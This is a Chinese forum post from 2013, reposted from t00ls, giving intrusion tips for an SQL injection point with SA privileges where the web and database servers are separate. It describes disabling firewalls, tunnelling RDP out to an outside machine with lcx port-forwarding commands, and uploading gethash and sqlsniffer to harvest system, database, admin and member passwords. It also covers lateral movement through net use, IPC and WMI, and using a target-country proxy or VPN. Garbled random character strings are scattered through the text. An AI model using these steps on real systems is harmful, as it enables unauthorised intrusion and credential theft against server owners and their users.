当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。
( U: y, j! ^1 t+ Y! V9 ~7 v, A: I! C4 \( c- r
/ g1 u! I- y( U# g9 | U
" _7 p2 s4 ^4 ?SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)
# D$ N# d0 |# H1 s. C4 u
4 u$ ]0 a2 n8 e' `- }. w
- [3 a$ R) B, N+ ^1 _, i; Q* [一、DB机有公网IP.* a1 X* Q+ ~# O
9 n9 |" M0 W$ B/ v+ m' [1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.
5 N$ w7 u! |6 L! u; j' p) Q V* j! R4 |4 E; Q& ?
3 v/ {+ n, d3 }0 r4 S3 O9 M5 h% n2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.
( b" d6 }9 U ^
3 \" u5 ?; P2 F l+ C W/ p/ A, P2 U4 j2 i4 F! V: E6 ^; j
3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
, F( ^: s3 Y. ]. z+ O% b H7 k5 }$ P% Z1 S5 N' B- ~
* u0 h6 k; W6 W3 @- m% @( c9 l0 y4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.
8 z/ |. W* N" { T) N; k8 B3 R4 \) O# l4 g
" w1 ?7 i; _9 `. u7 _% @9 U! Q
6 Q6 m) g8 }. ]' ?9 c7 q二、DB机只有内网IP* d3 t" p. e; o4 W; z' l7 @' ^4 i
- F4 n! p( f, K4 {/ {2 ]/ Y9 `1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.- b% {5 j" b& b F4 N" ~7 ~
0 n0 z* j3 y( J! w1 O% x( N' A8 _- l4 o+ _- E
2:停掉防火墙和IP策略再从内往外扫描.
) R8 j4 L$ n* g! e- M4 S- U1 B3 J7 T" q
9 u0 N3 m1 F" b' F
3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.# |8 \) J. n! u. o. t5 k
4 B# S, c0 S* c9 Q7 W* A3 h9 Z7 L6 h: ~) g a- O3 p9 A7 v* K# N9 }
4:学会密码规律分析往往会有惊喜.
) A5 r' L% X- x$ Z# R
3 Z( {/ }' L8 u3 n; x
& B+ u) ~9 w; D5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等+ v' d: B! B: o$ O
. {6 L2 _$ e* y) y2 t: s9 F' s5 N2 a" M( n
有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |
发表于 2013-2-16 21:46:01
收藏
支持
反对